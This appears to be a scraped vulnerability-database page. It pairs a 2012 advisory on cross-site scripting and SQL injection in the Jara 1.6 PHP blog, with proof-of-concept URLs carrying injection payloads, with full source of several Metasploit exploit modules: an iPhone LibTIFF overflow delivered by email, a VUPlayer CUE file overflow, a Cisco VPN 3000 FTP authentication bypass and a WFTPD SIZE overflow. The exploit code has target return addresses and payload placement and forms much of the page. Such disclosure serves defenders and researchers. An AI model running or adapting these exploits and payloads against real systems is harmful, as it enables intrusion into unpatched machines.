Jara 1.6 Cross Site Scripting / SQL Injection Vulnerabilities
2012-10-21T00:00:00
ID 1337DAY-ID-19680 Type zdt Reporter Canberk BOLAT Modified 2012-10-21T00:00:00
Description
Jara version 1.6 suffers from cross site scripting and remote SQL injection vulnerabilities.
Information
--------------------
Name : XSS and SQL Injection Vulnerabilities in Jara
Software : Jara 1.6 and possibly below.
Vendor Homepage : http://sourceforge.net/projects/jara/
Vulnerability Type : Cross-Site Scripting and SQL Injection
Severity : Critical
Researcher : Canberk Bolat
Advisory Reference : NS-12-009
Description
--------------------
An open source simple blog utilising the features of PHP 5 and MySQL
5. Supports multiple writers, categories, managing posts, static
content pages and post comments as well as providing an intuitive
administration panel.
Details
--------------------
Jara is affected by XSS and SQL Injection vulnerabilities in version 1.6.
Example PoC urls are as follows :
SQL Injection Vulnerabilities
http://example.com/login.php (POST - username)
http://example.com/login.php (POST - password)
http://example.com/admin/delete_page.php?id='%2BNSFTW%2B'
http://example.com/admin/delete_post.php?id='%2BNSFTW%2B'
http://example.com/admin/delete_category.php?id='%2BNSFTW%2B'
http://example.com/admin/delete_user.php?id='%2BNSFTW%2B'
http://example.com/admin/edit_page.php?id='%2BNSFTW%2B'
http://example.com/admin/edit_user.php?id='%2BNSFTW%2B'
http://example.com/admin/edit_post.php (POST - id)
http://example.com/admin/edit_category.php (POST - id)
XSS Vulnerabilities
http://example.com/view.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0031F8)%3C/script%3E
http://example.com/page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003214)%3C/script%3E
http://example.com/category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0032D5)%3C/script%3E
http://example.com/login.php (POST - username)
http://example.com/login.php (POST - password)
http://example.com/admin/delete_page.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
http://example.com/admin/delete_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003548)%3C/script%3E
http://example.com/admin/delete_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034CE)%3C/script%3E
http://example.com/admin/delete_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
http://example.com/admin/edit_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034D5)%3C/script%3E
http://example.com/admin/edit_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003542)%3C/script%3E
http://example.com/admin/edit_page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003569)%3C/script%3E
http://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
You can read the full article about Cross-Site Scripting and SQL
Injection vulnerabilities from here :
Cross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/
SQL Injection: http://www.mavitunasecurity.com/sql-injection/
Solution
--------------------
No patch released.
Advisory Timeline
--------------------
19/11/2011 - Couldn’t found a contact e-mail
22/08/2012 - Vulnerability Released
Credits
--------------------
It has been discovered on testing of Netsparker, Web Application
Security Scanner - http://www.mavitunasecurity.com/netsparker/.
References
--------------------
MSL Advisory Link :
http://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-jara/
Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/
# 0day.today [2018-03-06] #
{"published": "2012-10-21T00:00:00", "id": "1337DAY-ID-19680", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:48:43", "bulletin": {"published": "2012-10-21T00:00:00", "id": "1337DAY-ID-19680", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.4, "modified": "2016-04-20T01:48:43"}}, "hash": "e63a3027d9838faa84849ed37cfbd7defc5070895fcf0a4cf12194b565523948", "description": "Jara version 1.6 suffers from cross site scripting and remote SQL injection vulnerabilities.", "type": "zdt", "lastseen": "2016-04-20T01:48:43", "edition": 1, "title": "Jara 1.6 Cross Site Scripting / SQL Injection Vulnerabilities", "href": "http://0day.today/exploit/description/19680", "modified": "2012-10-21T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/19680", "references": [], "reporter": "Canberk BOLAT", "sourceData": "Information\r\n--------------------\r\nName : XSS and SQL Injection Vulnerabilities in Jara\r\nSoftware : Jara 1.6 and possibly below.\r\nVendor Homepage : http://sourceforge.net/projects/jara/\r\nVulnerability Type : Cross-Site Scripting and SQL Injection\r\nSeverity : Critical\r\nResearcher : Canberk Bolat\r\nAdvisory Reference : NS-12-009\r\n\r\nDescription\r\n--------------------\r\nAn open source simple blog utilising the features of PHP 5 and MySQL\r\n5. Supports multiple writers, categories, managing posts, static\r\ncontent pages and post comments as well as providing an intuitive\r\nadministration panel.\r\n\r\nDetails\r\n--------------------\r\nJara is affected by XSS and SQL Injection vulnerabilities in version 1.6.\r\n\r\nExample PoC urls are as follows :\r\n\r\nSQL Injection Vulnerabilities\r\nhttp://example.com/login.php (POST - username)\r\nhttp://example.com/login.php (POST - password)\r\nhttp://example.com/admin/delete_page.php?id='%2BNSFTW%2B'\r\nhttp://example.com/admin/delete_post.php?id='%2BNSFTW%2B'\r\nhttp://example.com/admin/delete_category.php?id='%2BNSFTW%2B'\r\nhttp://example.com/admin/delete_user.php?id='%2BNSFTW%2B'\r\nhttp://example.com/admin/edit_page.php?id='%2BNSFTW%2B'\r\nhttp://example.com/admin/edit_user.php?id='%2BNSFTW%2B'\r\nhttp://example.com/admin/edit_post.php (POST - id)\r\nhttp://example.com/admin/edit_category.php (POST - id)\r\n\r\nXSS Vulnerabilities\r\nhttp://example.com/view.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0031F8)%3C/script%3E\r\nhttp://example.com/page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003214)%3C/script%3E\r\nhttp://example.com/category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0032D5)%3C/script%3E\r\nhttp://example.com/login.php (POST - username)\r\nhttp://example.com/login.php (POST - password)\r\nhttp://example.com/admin/delete_page.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E\r\nhttp://example.com/admin/delete_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003548)%3C/script%3E\r\nhttp://example.com/admin/delete_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034CE)%3C/script%3E\r\nhttp://example.com/admin/delete_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E\r\nhttp://example.com/admin/edit_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034D5)%3C/script%3E\r\nhttp://example.com/admin/edit_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003542)%3C/script%3E\r\nhttp://example.com/admin/edit_page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003569)%3C/script%3E\r\nhttp://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E\r\n\r\n\r\nYou can read the full article about Cross-Site Scripting and SQL\r\nInjection vulnerabilities from here :\r\n\r\nCross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/\r\nSQL Injection: http://www.mavitunasecurity.com/sql-injection/\r\n\r\nSolution\r\n--------------------\r\nNo patch released.\r\n\r\nAdvisory Timeline\r\n--------------------\r\n19/11/2011 - Couldn\u2019t found a contact e-mail\r\n22/08/2012 - Vulnerability Released\r\n\r\nCredits\r\n--------------------\r\nIt has been discovered on testing of Netsparker, Web Application\r\nSecurity Scanner - http://www.mavitunasecurity.com/netsparker/.\r\n\r\nReferences\r\n--------------------\r\nMSL Advisory Link :\r\nhttp://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-jara/\r\nNetsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "f248dbe1d5e06a132752819b1559efca", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6463f68abb427067443463dde2dc45da", "key": "title"}, {"hash": "7f18ce50576690ef04eac83811db1fa1", "key": "published"}, {"hash": "7f18ce50576690ef04eac83811db1fa1", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "caa6d8e45140fb9002bb600d04719a2e", "key": "sourceHref"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "65f3db253d443cc790436d1286cbf860", "key": "description"}, {"hash": "686e07f6b675e9a4e978854b3a500540", "key": "sourceData"}, {"hash": "24640527aa19cec213c7e59f8b3fa377", "key": "href"}], "objectVersion": "1.0"}}], "description": "Jara version 1.6 suffers from cross site scripting and remote SQL injection vulnerabilities.", "hash": "986d30ddf6146ca5d7ad8e44a4b6e54efd6e8c11678cb5ad4dc040e658f707fb", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-03-06T22:06:21"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-17942", "1337DAY-ID-8399"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/VUPLAYER_CUE"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8911", "SECURITYVULNS:DOC:19680"]}], "modified": "2018-03-06T22:06:21"}, "vulnersScore": 0.3}, "type": "zdt", "lastseen": "2018-03-06T22:06:21", "edition": 2, "title": "Jara 1.6 Cross Site Scripting / SQL Injection Vulnerabilities", "href": "https://0day.today/exploit/description/19680", "modified": "2012-10-21T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/19680", "references": [], "reporter": "Canberk BOLAT", "sourceData": "Information\r\n--------------------\r\nName : XSS and SQL Injection Vulnerabilities in Jara\r\nSoftware : Jara 1.6 and possibly below.\r\nVendor Homepage : http://sourceforge.net/projects/jara/\r\nVulnerability Type : Cross-Site Scripting and SQL Injection\r\nSeverity : Critical\r\nResearcher : Canberk Bolat\r\nAdvisory Reference : NS-12-009\r\n\r\nDescription\r\n--------------------\r\nAn open source simple blog utilising the features of PHP 5 and MySQL\r\n5. Supports multiple writers, categories, managing posts, static\r\ncontent pages and post comments as well as providing an intuitive\r\nadministration panel.\r\n\r\nDetails\r\n--------------------\r\nJara is affected by XSS and SQL Injection vulnerabilities in version 1.6.\r\n\r\nExample PoC urls are as follows :\r\n\r\nSQL Injection Vulnerabilities\r\nhttp://example.com/login.php (POST - username)\r\nhttp://example.com/login.php (POST - password)\r\nhttp://example.com/admin/delete_page.php?id='%2BNSFTW%2B'\r\nhttp://example.com/admin/delete_post.php?id='%2BNSFTW%2B'\r\nhttp://example.com/admin/delete_category.php?id='%2BNSFTW%2B'\r\nhttp://example.com/admin/delete_user.php?id='%2BNSFTW%2B'\r\nhttp://example.com/admin/edit_page.php?id='%2BNSFTW%2B'\r\nhttp://example.com/admin/edit_user.php?id='%2BNSFTW%2B'\r\nhttp://example.com/admin/edit_post.php (POST - id)\r\nhttp://example.com/admin/edit_category.php (POST - id)\r\n\r\nXSS Vulnerabilities\r\nhttp://example.com/view.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0031F8)%3C/script%3E\r\nhttp://example.com/page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003214)%3C/script%3E\r\nhttp://example.com/category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0032D5)%3C/script%3E\r\nhttp://example.com/login.php (POST - username)\r\nhttp://example.com/login.php (POST - password)\r\nhttp://example.com/admin/delete_page.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E\r\nhttp://example.com/admin/delete_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003548)%3C/script%3E\r\nhttp://example.com/admin/delete_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034CE)%3C/script%3E\r\nhttp://example.com/admin/delete_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E\r\nhttp://example.com/admin/edit_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034D5)%3C/script%3E\r\nhttp://example.com/admin/edit_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003542)%3C/script%3E\r\nhttp://example.com/admin/edit_page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003569)%3C/script%3E\r\nhttp://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E\r\n\r\n\r\nYou can read the full article about Cross-Site Scripting and SQL\r\nInjection vulnerabilities from here :\r\n\r\nCross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/\r\nSQL Injection: http://www.mavitunasecurity.com/sql-injection/\r\n\r\nSolution\r\n--------------------\r\nNo patch released.\r\n\r\nAdvisory Timeline\r\n--------------------\r\n19/11/2011 - Couldn\u2019t found a contact e-mail\r\n22/08/2012 - Vulnerability Released\r\n\r\nCredits\r\n--------------------\r\nIt has been discovered on testing of Netsparker, Web Application\r\nSecurity Scanner - http://www.mavitunasecurity.com/netsparker/.\r\n\r\nReferences\r\n--------------------\r\nMSL Advisory Link :\r\nhttp://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-jara/\r\nNetsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/\n\n# 0day.today [2018-03-06] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "65f3db253d443cc790436d1286cbf860", "key": "description"}, {"hash": "e7f652163693b6343f104345a20391a3", "key": "href"}, {"hash": "7f18ce50576690ef04eac83811db1fa1", "key": "modified"}, {"hash": "7f18ce50576690ef04eac83811db1fa1", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f248dbe1d5e06a132752819b1559efca", "key": "reporter"}, {"hash": "a2f900544db2e7962d2d0ed86194690b", "key": "sourceData"}, {"hash": "288e42f8acb9af3ab51fe75db5d049d6", "key": "sourceHref"}, {"hash": "6463f68abb427067443463dde2dc45da", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-11-25T07:22:08", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload.\n", "modified": "2017-07-24T13:26:21", "published": "2012-09-10T22:42:17", "id": "MSF:EXPLOIT/APPLE_IOS/EMAIL/MOBILEMAIL_LIBTIFF", "href": "", "type": "metasploit", "title": "Apple iOS MobileMail LibTIFF Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n #\n # This module sends email messages via smtp\n #\n include Msf::Exploit::Remote::SMTPDeliver\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple iOS MobileMail LibTIFF Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the version of\n libtiff shipped with firmware versions 1.00, 1.01, 1.02, and\n 1.1.1 of the Apple iPhone. iPhones which have not had the BSD\n tools installed will need to use a special payload.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['hdm', 'kf'],\n 'References' =>\n [\n ['CVE', '2006-3459'],\n ['OSVDB', '27723'],\n ['BID', '19283']\n ],\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'Payload' =>\n {\n 'Space' => 1800,\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'ConnectionType' => '-bind -find',\n },\n },\n 'Arch' => ARCH_ARMLE,\n 'Platform' => %w{ osx },\n 'Targets' =>\n [\n\n [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',\n {\n 'Platform' => 'osx',\n\n # Scratch space for our shellcode and stack\n 'Heap' => 0x00802000,\n\n # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib\n 'Magic' => 0x300d562c,\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Aug 01 2006'\n ))\n\n end\n\n def autofilter\n false\n end\n\n def exploit\n\n exts = ['jpg', 'tiff', 'tif']\n\n gext = exts[rand(exts.length)]\n name = rand_text_alpha(rand(10)+1) + \".#{gext}\"\n data = Rex::Text.rand_text_alpha(rand(32)+1)\n tiff = generate_tiff(target)\n\n msg = Rex::MIME::Message.new\n msg.mime_defaults\n msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)\n msg.to = datastore['MAILTO']\n msg.from = datastore['MAILFROM']\n\n msg.add_part(Rex::Text.encode_base64(data, \"\\r\\n\"), \"text/plain\", \"base64\", \"inline\")\n msg.add_part_attachment(tiff, rand_text_alpha(rand(32)+1) + \".\" + gext)\n\n send_message(msg.to_s)\n\n print_status(\"Waiting for a payload session (backgrounding)...\")\n end\n\n def generate_tiff(targ)\n #\n # This is a TIFF file, we have a huge range of evasion\n # capabilities, but for now, we don't use them.\n # - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday\n #\n\n lolz = 2048\n tiff =\n \"\\x49\\x49\\x2a\\x00\\x1e\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x01\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x03\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\xaa\\x00\\x00\\x00\\x06\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x11\\x01\\x04\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x17\\x01\\x04\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x15\\x00\\x00\\x00\\x1c\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x50\\x01\\x03\\x00\"+\n [lolz].pack(\"V\") +\n \"\\x84\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n # Randomize the bajeezus out of our data\n hehe = rand_text(lolz)\n\n # Were going to candy mountain!\n hehe[120, 4] = [targ['Magic']].pack(\"V\")\n\n # >> add r0, r4, #0x30\n hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack(\"V\")\n\n # Candy mountain, Charlie!\n # >> mov r1, sp\n\n # It will be an adventure!\n # >> mov r2, r8\n hehe[ 92, 4] = [ hehe.length ].pack(\"V\")\n\n # Its a magic leoplurodon!\n # It has spoken!\n # It has shown us the way!\n # >> bl _memcpy\n\n # Its just over this bridge, Charlie!\n # This magical bridge!\n # >> ldr r3, [r4, #32]\n # >> ldrt r3, [pc], r3, lsr #30\n # >> str r3, [r4, #32]\n # >> ldr r3, [r4, #36]\n # >> ldrt r3, [pc], r3, lsr #30\n # >> str r3, [r4, #36]\n # >> ldr r3, [r4, #40]\n # >> ldrt r3, [pc], r3, lsr #30\n # >> str r3, [r4, #40]\n # >> ldr r3, [r4, #44]\n # >> ldrt r3, [pc], r3, lsr #30\n # >> str r3, [r4, #44]\n\n # We made it to candy mountain!\n # Go inside Charlie!\n # sub sp, r7, #0x14\n hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack(\"V\")\n\n # Goodbye Charlie!\n # ;; targ['Heap'] + 0x48 becomes the stack pointer\n # >> ldmia sp!, {r8, r10}\n\n # Hey, what the...!\n # >> ldmia sp!, {r4, r5, r6, r7, pc}\n\n # Return back to the copied heap data\n hehe[192, 4] = [ targ['Heap'] + 196 ].pack(\"V\")\n\n # Insert our actual shellcode at heap location + 196\n hehe[196, payload.encoded.length] = payload.encoded\n\n tiff << hehe\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/apple_ios/email/mobilemail_libtiff.rb"}, {"lastseen": "2019-12-09T08:24:28", "bulletinFamily": "exploit", "description": "This module exploits a stack based overflow in VUPlayer <= 2.49. When the application is used to open a specially crafted cue file, a buffer is overwritten allowing for the execution of arbitrary code.\n", "modified": "2017-09-14T02:03:34", "published": "2009-10-16T17:02:44", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/VUPLAYER_CUE", "href": "", "type": "metasploit", "title": "VUPlayer CUE Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'VUPlayer CUE Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack based overflow in VUPlayer <= 2.49. When\n the application is used to open a specially crafted cue file, a buffer is overwritten allowing\n for the execution of arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'OSVDB', '64581'],\n [ 'BID', '33960' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'DisablePayloadHandler' => 'true',\n 'AllowWin32SEH' => true\n },\n 'Payload' =>\n {\n 'Space' => 750,\n 'BadChars' => \"\\x00\",\n 'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\n 'DisableNops' => 'True',\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'VUPlayer 2.49', { 'Ret' => 0x1010539f } ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Aug 18 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.cue']),\n ])\n\n end\n\n def exploit\n\n sploit = rand_text_alpha_upper(1012)\n sploit << [target.ret].pack('V')\n sploit << \"\\x90\" * 12\n sploit << payload.encoded\n\n cue = \"FILE \"\"\\\"\"\n cue << sploit\n cue << \".BIN\"\"\\\"\" + \" BINARY\\r\\n\"\n cue << \"TRACK 01 MODE1/22352\\r\\n\"\n cue << \"INDEX 01 00:00:00\\r\\n\"\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n\n file_create(cue)\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/vuplayer_cue.rb"}, {"lastseen": "2019-12-03T12:57:37", "bulletinFamily": "exploit", "description": "This module tests for a logic vulnerability in the Cisco VPN Concentrator 3000 series. It is possible to execute some FTP statements without authentication (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs when working with CWD commands. This module simply creates an arbitrary directory, verifies that the directory has been created, then deletes it and verifies deletion to confirm the bug.\n", "modified": "2017-11-08T16:00:24", "published": "2009-07-06T10:05:21", "id": "MSF:AUXILIARY/ADMIN/CISCO/VPN_3000_FTP_BYPASS", "href": "", "type": "metasploit", "title": "Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access',\n 'Description' => %q{\n This module tests for a logic vulnerability in the Cisco VPN Concentrator\n 3000 series. It is possible to execute some FTP statements without authentication\n (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs\n when working with CWD commands. This module simply creates an arbitrary directory,\n verifies that the directory has been created, then deletes it and verifies deletion\n to confirm the bug.\n },\n 'Author'\t\t=> [ 'aushack' ],\n 'License'\t\t=> MSF_LICENSE,\n 'References'\t=>\n [\n [ 'BID', '19680' ],\n [ 'CVE', '2006-4313' ],\n [ 'OSVDB', '28139' ],\n [ 'OSVDB', '28138' ]\n ],\n 'DisclosureDate' => 'Aug 23 2006'))\n\n register_options(\n [\n Opt::RPORT(21),\n ])\n end\n\n def run\n connect\n res = sock.get_once\n if (res and res =~ /220 Session will be terminated after/)\n print_status(\"Target appears to be a Cisco VPN Concentrator 3000 series.\")\n\n test = Rex::Text.rand_text_alphanumeric(8)\n\n print_status(\"Attempting to create directory: MKD #{test}\")\n sock.put(\"MKD #{test}\\r\\n\")\n res = sock.get_once(-1,5)\n\n if (res =~/257 MKD command successful\\./)\n print_status(\"\\tDirectory #{test} reportedly created. Verifying with SIZE #{test}\")\n sock.put(\"SIZE #{test}\\r\\n\")\n res = sock.get_once(-1,5)\n if (res =~ /550 Not a regular file/)\n print_status(\"\\tServer reports \\\"not a regular file\\\". Directory verified.\")\n print_status(\"\\tAttempting to delete directory: RMD #{test}\")\n sock.put(\"RMD #{test}\\r\\n\")\n res = sock.get_once(-1,5)\n if (res =~ /250 RMD command successful\\./)\n print_status(\"\\tDirectory #{test} reportedly deleted. Verifying with SIZE #{test}\")\n sock.put(\"SIZE #{test}\\r\\n\")\n res = sock.get_once(-1,5)\n print_status(\"\\tDirectory #{test} no longer exists!\")\n print_status(\"Target is confirmed as vulnerable!\")\n end\n end\n end\n else\n print_status(\"Target is either not Cisco or the target has been patched.\")\n end\n disconnect\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb"}, {"lastseen": "2019-12-03T12:55:11", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in the SIZE verb in Texas Imperial's Software WFTPD 3.23.\n", "modified": "2017-07-24T13:26:21", "published": "2007-03-26T21:18:44", "id": "MSF:EXPLOIT/WINDOWS/FTP/WFTPD_SIZE", "href": "", "type": "metasploit", "title": "Texas Imperial Software WFTPD 3.23 SIZE Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Ftp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Texas Imperial Software WFTPD 3.23 SIZE Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the SIZE verb in\n Texas Imperial's Software WFTPD 3.23.\n },\n 'Author' => 'MC',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2006-4318' ],\n [ 'OSVDB', '28134' ],\n [ 'BID', '19617' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 500,\n 'BadChars' => \"\\x00\\x20\\x0a\\x0d\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' \t\t => 'win',\n 'Targets' =>\n [\n [ 'Windows 2000 Pro SP4 English',\t\t\t{ 'Ret' => 0x7c2d3028 } ],\n [ 'Windows XP Pro SP1 English',\t\t\t\t{ 'Ret' => 0x77dd1595 } ],\n [ 'Windows XP Pro SP2 English', { 'Ret' => 0x77d498ec } ],\n ],\n 'DisclosureDate' => 'Aug 23 2006',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n c = connect_login\n return if not c\n\n sploit = \"/\" + make_nops(525 - payload.encoded.length)\n sploit << payload.encoded + [target.ret].pack('V')\n\n print_status(\"Trying target #{target.name}...\")\n\n send_cmd(['SIZE', sploit], false)\n select(nil,nil,nil,2)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/wftpd_size.rb"}], "zdt": [{"lastseen": "2018-04-14T13:55:06", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2012-04-04T00:00:00", "published": "2012-04-04T00:00:00", "id": "1337DAY-ID-17942", "href": "https://0day.today/exploit/description/17942", "type": "zdt", "title": "AlstraSoft Site Uptime CSRF Vulnerability", "sourceData": "# Exploit Title: AlstraSoft Site Uptime CSRF\r\n# Author: Jonturk75\r\n# Vendor or Software Link: http://www.scripts.com/viewscript/alstrasoft-site-uptime/19680/\r\n# Category:: webapps\r\n# Demo : http://www.blizsoft.com/uptime/admin\r\n# Greetz: Inj3ct0r Exploit DataBase 